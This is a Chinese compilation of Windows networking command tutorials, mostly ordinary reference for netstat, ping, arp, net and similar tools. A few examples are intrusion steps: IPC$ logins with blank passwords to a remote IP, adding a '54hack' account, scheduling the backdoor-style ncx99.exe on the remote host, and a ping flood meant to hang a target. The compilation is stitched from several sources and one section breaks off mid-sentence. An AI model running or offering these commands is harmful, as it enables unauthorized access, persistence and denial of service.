Windows網絡命令

如何查看系統端口

Windows 中要查看系統端口，可以使用n etstat 命令，點擊開始 --- 運行 --- 鍵入 cmd ，打開命令提示符窗口，在命令提示符狀態下鍵入“ netstat -an ”，按下回車鍵后就可以看到以數字形式顯示的 TCP 和 UDP 連接的端口號及狀態。
如何關閉端口 :
  在默認的情況下，有很多不安全的或沒有什么用的端口是開啟的

比如 Telnet 服務的 23 端口、 FTP 服務的 21 端口、 SMTP 服務的 25 端口、 RPC 服務的 135 端口等，為了系統的安全性

可以通過下面的方法來關閉端口：
比如關閉 SMTP 服務的 25 端口，可以這樣做：打開控制面板 ---- 管理工具 ---- 服務，接着在打開的服務窗口中找到並雙擊“ Simple Mail TransferProtocol  （ SMTP ）”服務，單擊“停止”按鈕來停止該服務，然后在“啟動類型”中選擇“已禁用”，最后單擊“確定”按鈕即可。這樣，關閉了 SMTP 服務就相當於關閉了對應的端口。
還有種方法就是直接打開系統盤 C:\WINDOWS\SYSTEM32\drivers\etc 目錄下的 services 文件，用記事本打開，你可以看到自己開放的所有端口，如果想關掉此端口，只要在前面加上“ # ”號就可以了。
補：n etstat 命令用法 :

命令格式： Netstat -a -e -n -o-s
-a  表示顯示所有活動的 TCP 連接以及計算機監聽的 TCP 和 UDP 端口。
-e  表示顯示以太網發送和接收的字節數、數據包數等。
-n  表示只以數字形式顯示所有活動的 TCP 連接的地址和端口號。
-o  表示顯示活動的 TCP 連接並包括每個連接的進程 ID （ PID ）。
-s  表示按協議顯示各種連接的統計信息，包括端口號

【如何查看系統端口 與進程 的關聯】
一、根據進程查端口號
鍵入“tasklist”命令：列出系統正在運行的進程列表，把你要查的進程所對應的“PID”號記下或復制。
說明：相同的進程每次運行的“PID”號一般都不會相同，所以一旦該進程重啟后，該“PID”號就會改變，這就需要重新查看。
再鍵入“netstat -ano
findstr 1140”命令
“findstr 1140”表示查找進程PID為“1140”的TCP連接以及TCP、UDP端口的偵聽情況
可用 netstat/? 查看netstat的參數意義
二、根據端口號查進程
輸入“netstat-ano”命令，列出系統當前的端口列表
再輸入“tasklist/fi ″PID eq 788 ″
788 為進程PID
三、查出進程對應的程序
下面的操作就需要用到Windows2000（Server或Professional版都可以）安裝光盤中的一個工具。
首先在安裝光盤的“SupportTools”目錄下，用解壓軟件打開“support.cab”壓縮包，找到“tlist.exe”文件，將此文件釋放到任一目錄，如“D：Support”。然后在命令提示符窗口中切換到此目錄，運行“tlist.exe”命令，把要查的進程對應的PID號記下或復制（第一列就是進程的PID號），然后繼續輸入“tlist.exe 2012”命令（你輸入的時候，需要將剛才記下的PID號替換掉這里的2012），“CmdLine ”后面顯示的就是該進程對應的軟件所在的目錄。
除此之外，返回信息中還列出了該進程所調用的文件，得到了這些信息就可以很容易查出進程對應的程序了。
假如想關閉某個進程，可把該進程的PID號記下，在命令提符下輸入“taskkill/pid 2400”
2400是PID號）就可以將PID號為2400的進程關閉，如果要強制關閉該進程，只須在這條命令的后面加個“/f”參數即可。


查看系統端口占用情況

輸入netstat -ano 即可看到所有連接的PID 之后在任務管理器中找到這個PID所對應的程序如果任務管理器中沒有PID這一項,可以在任務管理器中選"查看"-"選擇列"

經常，我們在啟動應用的時候發現系統需要的端口被別的程序占用，如何知道誰占有了需要的端口，很多人都比較頭疼，下面就介紹一種非常簡單的方法，希望對大家有用

假如我們需要確定誰占用了9050端口

1、Windows平台
在windows命令行窗口下執行：

C:\>netstat -aon|findstr"9050"

TCP   127.0.0.1:9050         0.0.0.0:0              LISTENING       2016
看到了嗎，端口被進程號為2016的進程占用，繼續執行下面命令：

C:\>tasklist | findstr "2016"tor.exe                     
2016 Console                 0     16,064 K這樣就找到占用此端口的程序了..

 

Windows 自帶網絡小工具介紹  
　　網絡工具多多，但精品甚少，我們不必舍近求遠，所以先把 Windows 自己帶的幾個網絡工具給大家做一下介紹。需要指出的是，這些工具都在 Windows 的目錄中，別再問我到哪里去找了！不特殊說明的話，這里的 Windows 是指 Windows98! 
1 、 PING.EXE 

　　ping 只有在安裝了 TCP/IP 協議以后才可以使用 . 

該命令主要是用來檢查網絡是否能夠連通。它的使用格式是在命令提示符下鍵入： 

ping IP 地址或主機名 

　　執行結果顯示響應時間，重復執行這個命令，你可以發現 ping 報告的響應時間是不同的，這主要取決於網絡的繁忙程度。 ping 命令后還可跟很多參數，你可以鍵入 ping 后回車其中會有很詳細的說明。如果用戶的電腦不能正常聯網，可以使用 ping 命令來進行故障排除： 

作用一：探測本地的計算機是否通過網絡和指定 IP 地址的計算機相連接；用法： 

Ping 127.0.0.1 回車 

ping 202.96.210.190 <enter> 

它可以用來檢測局域網里各電腦是否相連。 

說明：若看到“ Reply from .... ”說明相連；若看到“ Request time out ”說明沒相連接。 
作用二：根據域名獲得 IP 地址，用法： 

Ping www.microsoft.com 回車 

說明：看到的 Reply from 的 xxx.xxx.xxx.xxx 就是 www.microsoft.com 對應的 IP 地址． 

（ 1 ）、網絡管理員可在服務器上使用 ping 命令 ping 用戶機，如果成功，接着在用戶端對服務器執行 ping 命令，如果也成功，則說明這一網絡沒有故障。 

（ 2 ）、如果網絡管理員的 ping 命令執行成功而用戶的 ping 命令執行不成功，則故障原因很可能是用戶端的網絡系統配置文件有問題。 

（ 3 ）、如果網絡管理員和用戶的 ping 命令都失敗了，這時可注意 ping 命令顯示的出錯信息，這種出錯信息通常分為三種情況： 

① unknown host （不知名主機），這種出錯信息的意思是該台電腦的名字不能被 DNS 服務器轉換成 IP 地址。網絡故障可能為 DNS 服務器有故障，或者其名字不正確，或者服務器與客戶機之間的通信線路出現了故障。 

② network unreachable （網絡不能到達），這是用戶電腦沒有到達服務器的路由，可用 netstat -rn 檢查路由表來確定路由配置情況。 

③ no answer （無響應），服務器沒有響應。這種故障說明用戶電腦有一條到達服務器的路由，但卻接收不到它發給服務器發來的任何信息。這種故障的原因可能是 : 服務器沒有工作，或者用戶電腦或服務器網絡配置不正確。 

作用三：根據 IP 地址獲取域名，用法： 

Ping -a xxx.xxx.xxx.xxx 

說明：看到的 Ping xyz [xxx.xxx.xxx.xxx]... 的 xyz 就是 IP 對應的域名。 

2 、 IPCONFIG.EXE （ Windows 95 里叫 WINIPCFG.EXE ） 

只要運行 IPCONFIG.EXE 就能看到我自己的 IP 地址了 

該工具主要展示了兩條信息， IP 配置信息和 IP 配置參數，它能報告出你機器中的撥號網絡適配器和以太網卡的信息，以下給出了一個撥號網絡適配器的部分信息： 
Description （描述）： PPP Adapater （點對點數據傳輸協議） 
IP Address （ IP 地址）： 202.96.168.10 （動態 IP 地址） 
Subnet Mask （子網掩碼）： 255.255.255.255 （用於識別是否在同一局域網內） 
Default Gateway （默認網關）： 202.96.168.10 （溝通不同網絡的接點） 
DNS Server （域名服務器）： 202.96.199.162 （提供域名到 IP 的查詢服務） 
顯示全部信息的用法為： IPCONFIG.EXE -all 回車 
3 、 NETSTAT.EXE 
該工具顯示了您的計算機上的 TCP 連接表、 UDP 監聽者表以及 IP 協議統計。通常你可以通過這些信息發現你機器上正在打開的端口和服務，利用這你可以檢查你的機器上是否有木馬哦！不過這需要有 TCP/IP 的基本常識。同時你還可以看到你的機器正在和那些 IP 地址以 TCP 、 UDP 或其他協議進行連接的狀態。 
顯示全部信息的用法為： NETSTAT.EXE -a 回車 
4 、 ROUTE.EXE 
該工具顯示了您的機器 IP 的路由表，主要顯示這幾個方面的信息：目標地址、網絡掩碼、網關、本地 IP 地址和公制。 
顯示全部信息的用法為： ROUTR.EXE print 回車 
5 、 ARP.EXE 該工具用於查看和處理 ARP 緩存， ARP 是名字解析協議的意思，負責把一個 IP 地址解析成一個物理性的 MAC 地址。 

APR 可以設置 IP 地址和網卡 MAC 地址的捆綁，其主要參數作用是： 

－ s 設置 IP 地址與網卡 MAC 地址的捆綁。 

－ d 取消 IP 地址與網卡 MAC 地址的捆綁。 

－ a 顯示 P 地址與網卡 MAC 地址的捆綁情況。 

例如，計算機的 IP 地址為 192.168.110.23 ，網卡的 MAC 地址為 00 － 05 － 5d － 04 － 63 － 69 

在代理服務器運行： arp –s 192.168.110.23 00 － 05 － 5d － 04 － 63 － 69 

這樣就將該機的靜態 IP 地址 192.168.110.23 和網卡的 MAC 地址 00 － 05 － 5d － 04 － 63 － 69 捆綁在一起了。 

顯示全部信息的用法為： ARP -a 回車 ，可以顯示局域網內所有 IP 地址和網卡 MAC 地址的對應情況。如果事先將局域網內所有 IP 地址和 MAC 地址的對應關系機記錄下來（工具 TCP NetView 可以列出一個網段內所有計算機的 IP 地址、 MAC 地址、計算機名和計算機說明，並且提供了將這個對應關系導出到 txt 文本文件的功能），就可以用 ”arp –a” 命令與之比較，可以查出 IP 地址是否被盜。 

6 、 NBTSTAT.EXE 
該工具主要用於查看當前基於 NETBIOS 的 TCP/IP 連接狀態，通過該工具你可以獲得遠程或本地機器的組名和機器名。 
用法為： NBTSTAT -a 域名 或 NBTSTAT -A IP 地址 回車　 
以上只是對這些常見但很有用卻容易被大家忽略的網絡小工具做了簡單的介紹，其實它們的功能還是非常強大的，需要大家去理解和發掘，不過這的確需要一些網絡的基礎知識做依托。 

　　三、使用 PING 判斷 TCP/IP 網絡故障  

在網絡管理中， PING 時使用的最頻繁的命令之一，學會使用 PING 來判斷 TCP/IP 網絡故障是一個網絡用戶應具備的技能。而且，在遇到網絡不通的故障時， PING 命令的使用順序（即故障的診斷排查順序）也有一定的講究。具體的診斷順序如下： 

1 、 PING 127.0.0.1 

PING 127.0.0.1 是本地循壞地址，如果該地址無法 PING 通，則表明本機 TCP/IP 協議不能正常工作；如果 PING 通了該地址，證明 TCP/IP 協議正常，則進入下一個步驟繼續診斷。 

2 、 PING 本機的 IP 地址 

使用 IPCONFIG 命令可以查看本機的 IP 地址， PING 該 IP 地址，如果 PING 通，表明網絡適配器（網卡或者 MODEM ）工作正常，則需要進入下一個步驟繼續檢查；反之則是網絡適配器出現故障。 

3 、 PING 同網段計算機的 IP 地址 

PING 一台同網段計算機的 IP 地址， PING 不通則表明網絡線路出現故障。如果網絡中還包含有路由器，則應當先 PING 路由器在本網段端口的 IP 地址，不通則此段線路有問題，通則再 PING 路由器在目標計算機所在網段的端口 IP 地址，不通則是路由出現故障。如果通，最后再 PING 目標機的 IP 地址。 

4 、 PING 網址 

如果要檢測的是一個帶 DNS 服務的網絡（比如 INTERNET ），並且能 PING 通了目標計算機的 IP 地址后，仍然無法連接到該機，則可以 PING 該機的網絡名（域名），比如： PING www.sina.com ，正常情況下會出現網址所指向的 IP 地址，這表明本機的 DNS 設置正確而且 DNS 服務工作正常，反之就可能是其中之一出現了故障；同樣也可以通過 PING 計算機名檢測 WIN 解析的故障（ WINS 是將計算機名解析到 IP 地址的服務）。 

　　四、計算機網絡實用命令 

1、ping命令 

在 DOS 底下，運行 ping 既可！ 
如： ping 192.168.0.1 檢測主機有沒有連接到網上。 
-a 將目標的機器標識轉換為 ip 地址 
-t 若使用者不人為中斷會不斷的 ping 下去 
-c count 要求 ping 命令連續發送數據包，直到發出並接收到 count 請求 
-d 為使用的套接字打開調試狀態 
-f 是一種快速方式 ping 。使得 ping 輸出數據包的速度和數據包從遠程主機返回一樣快，或者更快，達到每秒 100 次。在這種方式下，每個請求用一個句點表示。對於每一個響應打印一個空格鍵。 
-i seconds 在兩次數據包發送之間間隔一定的秒數。不能同 -f 一起使用。 
-n 只使用數字方式。在一般情況下 ping 會試圖把 IP 地址轉換成主機名。這個選項要求 ping 打印 IP 地址而不去查找用符號表示的名字。如果由於某種原因無法使用本地 DNS 服務器這個選項就很重要了。 
-p pattern 擁護可以通過這個選項標識 16 pad 字節，把這些字節加入數據包中。當在網絡中診斷與數據有關的錯誤時這個選項就非常有用。 
-q 使 ping 只在開始和結束時打印一些概要信息。 
-R 把 ICMP RECORD-ROUTE 選項加入到 ECHO_REQUEST 數據包中，要求在數據包中記錄路由，這樣當數據返回時 ping 就可以把路由信息打印出來。每個數據包只能記錄 9 個路由節點。許多主機忽略或者放棄這個選項。 
-r 使 ping 命令用於發送數據包的正常路由表。 
-s packetsize 使用戶能夠標識出要發送數據的字節數。缺省是 56 個字符，再加上 8 個字節的 ICMP 數據頭，共 64 個 ICMP 數據字節。 
-v 使 ping 處於 verbose 方式。它要 ping 命令除了打印 ECHO-RESPONSE 數據包之外，還打印其它所有返回的 ICMP 數據包。 

★得到該網站的IP地址: ping　網站域名　　　　　　  

★得到該網站的域名: 　ping　-a 網站IP地址　　　　 　　　  

★得到該計算機的IP地址（注：若有防火牆，可能ping不出）：　ping 計算機主機名　　　　　　　　　　 

★向目標計算機不停地發送500字節的數據包，同時要求目標計算機返回同樣的數據包，這樣可能目標計算機掛起來或重新啟動：　ping -l 500 -t IP 

2、tracert命令 

★顯示從本地計算機到該域名的服務器所經過的計算機：　tracert　網站域名　　　　　　　　　　 

3、nbtstat命令 

★使用遠程計算機的名稱列出其名稱表：　　nbtstat -a IP 　　　　　　　　　　　　 

4、netstat命令 

如：你想知道對方能 IP 地址，直接在 dos 運行： netstat -n 
-A 顯示任何關聯的協議控制塊的地址。主要用於調試 
-a 顯示所有套接字的狀態。在一般情況下不顯示與服務器進程相關聯的套接字 
-i 顯示自動配置接口的狀態。那些在系統初始引導后配置的接口狀態不在輸出之列 
-m 打印網絡存儲器的使用情況 
-n 打印實際地址，而不是對地址的解釋或者顯示主機，網絡名之類的符號 
-r 打印路由選擇表 
-f address -family 對於給出名字的地址簇打印統計數字和控制塊信息。到目前為止，唯一支持的地址簇是 inet 
-I interface 只打印給出名字的接口狀態 
-p protocol-name 只打印給出名字的協議的統計數字和協議控制塊信息 
-s 打印每個協議的統計數字 
-t 在輸出顯示中用時間信息代替隊列長度信息。 

netstat 命令的列標題 
Name 接口的名字 
Mtu 接口的最大傳輸單位 
Net/Dest 接口所在的網絡 
Address 接口的 IP 地址 
Ipkts 接收到的數據包數目 
Ierrs 接收到時已損壞的數據包數目 
Opkts 發送的數據包數目 
Oeers 發送時已損壞的數據包數目 
Collisions 由這個接口所記錄的網絡沖突數目 

★顯示出計算機當前所開放的端口，並顯示出與當前計算機相連接的IP地址：　netstat -a 

★顯示本機IP端口與遠程IP端口的連接：　netstat -n　 

5、net命令　（windows9x下的命令沒有windows2000下那么強大，沒有擴展性。） 

鑒於 Net 的命令參數太多，現只介紹與網絡有關的一些參數用法 
(1)NET VIEW （使用前提：必須建立 IPC$ 連接）  

作 用：顯示域列表、計算機列表或指定計算機的共享資源列表。 
命令格式： net view [\\computername | /domain[:domainname]] 
參數介紹： 
(1) 鍵入不帶參數的 net view 顯示當前域的計算機列表。 
(2)\\computername 指定要查看其共享資源的計算機名。 
(3)/domain[:domainname] 指定要查看其可用計算機的域。 
簡單事例： 

(1)net view \\XKY 查看 XKY 的共享資源列表。 
(2)net view /domain:XKY 查看 XKY 域中的機器列表 。 
(2)NET USE （使用前提：必須建立 IPC$ 連接） 
作 用：連接計算機或斷開計算機與共享資源的連接，或顯示計算機的連接信息。 
命令格式： net use [devicename | *] [\\computername\sharename[\volume]] [password | *]] [/user:[domainname\]username] [[/delete] | [/persistent:{yes | no}]] 
參數介紹： 
　　 鍵入不帶參數的 net use 列出網絡連接。 
devicename 指定要連接到的資源名稱或要斷開的設備名稱。 
\\computername\sharename 服務器及共享資源的名稱。 
password 訪問共享資源的密碼。 
* 提示鍵入密碼。 
/user 指定進行連接的另外一個用戶。 
domainname 指定另一個域。 
username 指定登錄的用戶名。 
/home 將用戶連接到其宿主目錄。 
/delete 取消指定網絡連接。 
/persistent 控制永久網絡連接的使用。 
簡單事例： 
(1)net use e: \\192.168.123.20\TEMP 將 \\192.168.123.20\TEMP 目錄建立為 E 盤 
(2)net use e: /delete 斷開連接 
(3)NET TIME 
作 用：使計算機的時鍾與另一台計算機或域的時間同步。 
命令格式： net time [\\computername | /domain[:name]] [/set] 
參數介紹： 
(1)\\computername 要檢查或同步的服務器名。 
(2)/domain[:name] 指定要與其時間同步的域。 
(3)/set 使本計算機時鍾與指定計算機或域的時鍾同步。 
下面的這 4 個參數是相關的，所以一起介紹 
(4)Net Share 
作 用：創建、刪除或顯示共享資源。 
命令格式： net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"] 
參數介紹： 
(1) 鍵入不帶參數的 net share 顯示本地計算機上所有共享資源的信息。 
(2)sharename 是共享資源的網絡名稱。 
(3)drive:path 指定共享目錄的絕對路徑。 
(4)/users:number 設置可同時訪問共享資源的最大用戶數。 
(5)/unlimited 不限制同時訪問共享資源的用戶數。 
(6)/remark:"text " 添加關於資源的注釋，注釋文字用引號引住。 
簡單事例： 
(1)net share mylove=c:\temp /remark:"my first share" 以 mylove 為共享名共享 C:\temp 
(2)net share mylove /delete 停止共享 mylove 目錄 
上面介紹的是 NET 命令在 WINNT 下的基本用法 。 

net use 命令：將計算與共享資源連接或斷開，或者顯示關於計算機連接的信息。 

★檢索網絡連接列表：net use 　　　　　　　　　　　　　　　 

★用戶名為system32，密碼為ffhh與計算機61.150.115.7進行ipc$連接：
　　　net use \\61.150.115.7\ipc$ ffhh　/user:system32　　　　　　　　　　　　　　　　　　　　　　　　　　　　  

★用戶名為system32，密碼為空與計算機61.150.115.7進行ipc$連接：
　　　net use \\61.150.115.7\ipc$ “” /user:system32　　　　　　　　　　　　　　　　　　　　　　　　　　　　 

★將遠程計算機的C盤映射為本地為O盤：　net use o:\\61.150.115.7\c$　　　　　　　　　　　　 

net user 命令：添加或修改用戶賬戶或者顯示用戶賬戶信息。 

★指定要添加、刪除、修改或查看的用戶賬戶名： net user 54hack 

★添加一個用戶名為ffhh，密碼為12332：　　net user ffhh 12332 /add 

★ 將用戶賬戶添加到用戶賬戶數據庫：　　net user 54hack /add 

★ 從用戶賬戶數據庫中刪除用戶賬戶：　　net user ffhh /delete 

★啟用guest賬戶：　　　net user guest /active:yes 

★禁用guest賬戶 ：　　net user guest /active:no 

★用戶admin可以更改自己密碼：　　　net user admin /passwordchg:yes 

★用戶admin必須要有密碼：　　　net user admin /passwordreg:yes 

net view命令：顯示域列表、計算機列表或者由指定計算機共享的資源。 

★列出本地機的當前域中計算機的列表：　　　net view 

★查看遠程計算機的共享資源：　　　net view \\61.153.230.130 

net share命令：創建、刪除或顯示共享資源。 

★顯示本地計算機上共享資源：　　　net share 

★啟動admin&共享：　　　net share admin$ 

★停止admin&的共享：　　net share admin$ /delete 

net stop命令：停止windows2000的server服務 

★停止server服務：　net stop　server 

net start命令：啟動服務或顯示已啟動的服務 

★啟動server服務：　 net start　server 

★顯示遠程計算機當前的時間：　　net time \\61.150.115.7 

6、at命令 

　　列出指定的時間和日期在計算機上運行的已計划命令或計划命令和程序。必須正在運行計划任務才能使用at命令。 

★列出本機已計划的命令： at 

★ 顯示遠程計算機的計划任何列表： at \\61.150.115.7 

★刪除所有計划任務：　　at \\61.150.115.7 /delete 

★當刪除已計划的事件時，對系統的詢問強制進行肯定的回答： 

　　at \\61.150.115.7 /delete /yes 

★ 讓遠程計算機61.150.115.7每月2日上午02:29執行C盤下的ncx99.exe： 

　　at \\61.150.115.7　02:29 /every:2 c:\ncx99.exe 

7、FTP命令(在使用FTP命令之前，必須先登錄到遠程計算機，才能進行一系列FTP命令的操作) 

★登錄到目標機：　ftp 192.168.0.1 

★列出目標主機的文件目錄：dir 

★將本地計算機D盤下的文件ffhh.txt復制到遠程計算機images目錄下： 

　　put d:\ffhh.txt images\ffhh.txt 

★將遠程計算機上的edit.asp復制到本機D盤下：  

get edit.asp d:\edit.asp 

★刪除文件(刪除遠程計算機上的文件ffhh.txt)：mdelete ffhh.txt 

★ 創建目錄（在遠程計算機上創建文件夾ffhh）：mkdir ffhh 

★重命名文件（將遠程計算機上的文件ffhh.asp重命名為web.asp）： 

rename ffhh.asp web.asp　 

★退出FTP：bye　 




1.最基本，最常用的，測試物理網絡的 PING
　　ping 192.168.0.8 －t ，參數－t是等待用戶去中斷測試
　　
　　2.查看DNS、IP、Mac等
　　A.Win98：winipcfg
　　B.Win2000以上：Ipconfig/all
　　
　　C.NSLOOKUP：如查看河北的DNS
　　C:\>nslookup
　　Default Server: ns.hesjptt.net.cn
　　Address: 202.99.160.68
　　>server 202.99.41.2 則將DNS改為了41.2
　　> pop.pcpop.com
　　Server: ns.hesjptt.net.cn
　　Address: 202.99.160.68
　　
　　Non-authoritative answer:
　　Name: pop.pcpop.com
　　Address: 202.99.160.212
　　
　　3.網絡信使 （經常有人問的~）
　　Net send 計算機名/IP　* (廣播) 傳送內容，注意不能跨網段
　　net stop messenger 停止信使服務，也可以在面板－服務修改
　　net start messenger 開始信使服務
　　
　　4.探測對方對方計算機名，所在的組、域及當前用戶名 （追捕的工作原理）
　　ping －a IP －t ，只顯示NetBios名
　　nbtstat -a 192.168.10.146 比較全的
　　
　　5.netstat -a 顯示出你的計算機當前所開放的所有端口
　　netstat -s -e 比較詳細的顯示你的網絡資料，包括TCP、UDP、ICMP 和 IP的統計等
　　
　　6.探測arp綁定（動態和靜態）列表，顯示所有連接了我的計算機，顯示對方IP和MAC地址
　　arp -a
　　
　　7.在代理服務器端
　　捆綁IP和MAC地址，解決局域網內盜用IP！：
　　ARP －s 192.168.10.59 00 －50－ff－6c－08－75
　　解除網卡的IP與MAC地址的綁定：
　　arp -d 網卡IP
　　
　　8.在網絡鄰居上隱藏你的計算機 （讓人家看不見你！）
　　net config server /hidden:yes
　　net config server /hidden:no 則為開啟
　　
　　9.幾個net命令
　　A.顯示當前工作組服務器列表 net view，當不帶選項使用本命令時，它就會顯示當前域或網絡上的計算機上的列表。
　　比如：查看這個IP上的共享資源，就可以
　　C:\>net view 192.168.10.8
　　在 192.168.10.8 的共享資源
　　資源共享名 類型 用途 注釋
　　--------------------------------------
　　網站服務 Disk
　　命令成功完成。
　　
　　B.查看計算機上的用戶帳號列表 net user
　　C.查看網絡鏈接 net use
　　例如：net use z: \\192.168.10.8\movie 將這個IP的movie共享目錄映射為本地的Z盤
　　
　　D.記錄鏈接 net session
　　例如：
　　C:\>net session
　　計算機 用戶名 客戶類型 打開空閑時間
　　-------------------------------------------------------------------------------
　　\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
　　
　　\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
　　命令成功完成。
　　
　　10.路由跟蹤命令
　　A.tracert pop.pcpop.com
　　B.pathping pop.pcpop.com 除了顯示路由外，還提供325S的分析，計算丟失包的％
　　
　　11.關於共享安全的幾個命令
　　A.查看你機器的共享資源 net share
　　B.手工刪除共享（可以編個bat文件，開機自運行，把共享都刪了！）
　　net share c$ /d
　　net share d$ /d
　　net share ipc$ /d
　　net share admin$ /d
　　注意$后有空格。
　　C.增加一個共享：
　　c:\net share mymovie=e:\downloads\movie /users:1
　　mymovie 共享成功。
　　同時限制鏈接用戶數為1人。
　　
　　12.在DOS行下設置靜態IP
　　
　　A.設置靜態IP
　　
　　CMD
　　netsh
　　netsh>int
　　interface>ip
　　interface ip>set add "本地鏈接" static IP地址 mask gateway
　　B.查看IP設置
　　interface ip>show address
　　
　　Arp
　　顯示和修改“地址解析協議 (ARP)”緩存中的項目。ARP 緩存中包含一個或多個表，它們用於存儲 IP 地址及其經過解析的以太網或令牌環物理地址。計算機上安裝的每一個以太網或令牌環網絡適配器都有自己單獨的表。如果在沒有參數的情況下使用，則 arp 命令將顯示幫助信息。
　　
　　語法
　　arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
　　
　　參數
　　-a [InetAddr] [-N IfaceAddr]
　　顯示所有接口的當前 ARP 緩存表。要顯示指定 IP 地址的 ARP 緩存項，請使用帶有 InetAddr 參數的 arp -a，此處的 InetAddr 代表指定的 IP 地址。要顯示指定接口的 ARP 緩存表，請使用 -N IfaceAddr 參數，此處的 IfaceAddr 代表分配給指定接口的 IP 地址。-N 參數區分大小寫。
　　-g [InetAddr] [-N IfaceAddr]
　　與 -a 相同。
　　-d InetAddr [IfaceAddr]
　　刪除指定的 IP 地址項，此處的 InetAddr 代表 IP 地址。對於指定的接口，要刪除表中的某項，請使用 IfaceAddr
　　參數，此處的 IfaceAddr 代表分配給該接口的 IP 地址。要刪除所有項，請使用星號 (*) 通配符代替 InetAddr。
　　-s InetAddr EtherAddr [IfaceAddr]
　　向 ARP 緩存添加可將 IP 地址 InetAddr 解析成物理地址 EtherAddr 的靜態項。要向指定接口的表添加靜態 ARP 緩存項，請使用 IfaceAddr 參數，此處的 IfaceAddr 代表分配給該接口的 IP 地址。
　　/?
　　在命令提示符顯示幫助。
　　注釋
　　InetAddr 和 IfaceAddr 的 IP 地址用帶圓點的十進制記數法表示。
　　物理地址 EtherAddr 由六個字節組成，這些字節用十六進制記數法表示並且用連字符隔開（比如，00-AA-00-4F-2A-9C）。
　　通過 -s 參數添加的項屬於靜態項，它們不會 ARP 緩存中超時。如果終止 TCP/IP 協議后再啟動，這些項會被刪除。要創建永久的靜態 ARP 緩存項，請在批處理文件中使用適當的 arp 命令並通過“計划任務程序”在啟動時運行該批處理文件。
　　只有當網際協議 (TCP/IP) 協議在 網絡連接中安裝為網絡適配器屬性的組件時，該命令才可用。
　　范例
　　要顯示所有接口的 ARP 緩存表，可鍵入：
　　
　　arp -a
　　
　　對於指派的 IP 地址為 10.0.0.99 的接口，要顯示其 ARP 緩存表，可鍵入：
　　
　　arp -a -N 10.0.0.99
　　
　　要添加將 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的靜態 ARP 緩存項，可鍵入：
　　
　　arp -s 10.0.0.80 00-AA-00-4F-2A-9C
　　At
　　計划在指定時間和日期在計算機上運行命令和程序。at 命令只能在“計划”服務運行時使用。如果在沒有參數的情況下使用，則 at 列出已計划的命令。
　　
　　語法
　　at [\\ComputerName] [{[ID] [/delete]　/delete [/yes]}]
　　
　　at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]　/next:date[,...]}] command]
　　
　　參數
　　\\computername
　　指定遠程計算機。如果省略該參數，則 at 計划本地計算機上的命令和程序。
　　ID
　　指定指派給已計划命令的識別碼。
　　/delete
　　取消已計划的命令。如果省略了 ID，則計算機中所有已計划的命令將被取消。
　　/yes
　　刪除已計划的事件時，對來自系統的所有詢問都回答“是”。
　　
　　hours:minutes
　　指定命令運行的時間。該時間用 24 小時制（即從 00:00 [午夜] 到 23:59）的 小時: 分鍾格式表示。
　　/interactive
　　對於在運行 command 時登錄的用戶,允許 command 與該用戶的桌面進行交互。
　　/every:
　　在每個星期或月的指定日期（例如，每個星期四，或每月的第三天）運行 command 命令。
　　
　　date
　　指定運行命令的日期。可以指定一周的某日或多日（即，鍵入 M、T、W、Th、F、S、Su）或一個月中的某日或多日（即，鍵入從 1 到31 之間的數字）。用逗號分隔多個日期項。如果省略了 date，則 at 使用該月的當前日。
　　/next:
　　在下一個指定日期（比如，下一個星期四）到來時運行 command。
　　
　　command
　　指定要運行的 Windows 命令、程序（.exe 或 .com 文件）或批處理程序（.bat 或 .cmd 文件）。當命令需要路徑作為參數時，請使用絕對路徑，也就是從驅動器號開始的整個路徑。如果命令在遠程計算機上，請指定服務器和共享名的通用命名協定 (UNC) 符號，而不是遠程驅動器號。
　　/?
　　在命令提示符顯示幫助。
　　注釋
　　Schtasks 是功能更為強大的超集命令行計划工具，它含有 at 命令行工具中的所有功能。對於所有的命令行計划任務，都可以使用 schtasks 來替代 at。有關 schtasks 的詳細信息，請參閱“相關主題”。
　　
　　使用 at
　　使用 at 命令時，要求您必須是本地 Administrators 組的成員。
　　
　　加載 Cmd.exe
　　在運行命令之前，At 不會自動加載 Cmd.exe （命令解釋器）。如果沒有運行可執行文件 (.exe)，則在命令開頭必須使用如下所示的方法專門加載 Cmd.exe：
　　
　　cmd /c dir > c:\test.out。
　　
　　查看已計划的命令
　　當不帶命令行選項使用 at 時，計划任務會出現在類似於以下格式的表中：
　　
　　Status ID Day Time Command Line
　　OK 1 Each F 4:30 PM net send group leads status due
　　OK 2 Each M 12:00 AM chkstor > check.file
　　OK 3 Each F 11:59 PM backup2.bat
　　包含標識號 (ID)
　　當在命令提





我想大家不會忘記Windows是從簡單的DOS字符界面發展過來的。雖然我們平時在使用Windows操作系統的時候，主要是對圖形界面進行操作，但是DOS命令我們仍然非常有用。 

　　下面就讓我看來看看這些命令到底有那些作用，同時學習如何使用這些命令的技巧。 

　　一、Ping命令的使用技巧 

　　Ping是個使用頻率極高的實用程序，用於確定本地主機是否能與另一台主機交換（發送與接收）數據報。根據返回的信息，我們就可以推斷TCP/IP參數是否設置得正確以及運行是否正常。需要注意的是：成功地與另一台主機進行一次或兩次數 據報交換並不表示TCP/IP配置就是正確的，我們必須執行大量的本地主機與遠程主機的數據報交換，才能確信TCP/IP的正確性。 

　　簡單的說，Ping就是一個測試程序，如果Ping運行正確，我們大體上就可以排除網絡訪問層、網卡、MODEM的輸入輸出線路、電纜和路由器等存在的故障，從而減小了問題的范圍。但由於可以自定義所發數據報的大小及無休止的高速發送，Ping也被某些別有用心的人作為DDOS（拒絕服務攻擊）的工具，例如許多大型的網站就是被黑客利用數百台可以高速接入互聯網的電腦連續發送大量Ping數據報而癱瘓的。 

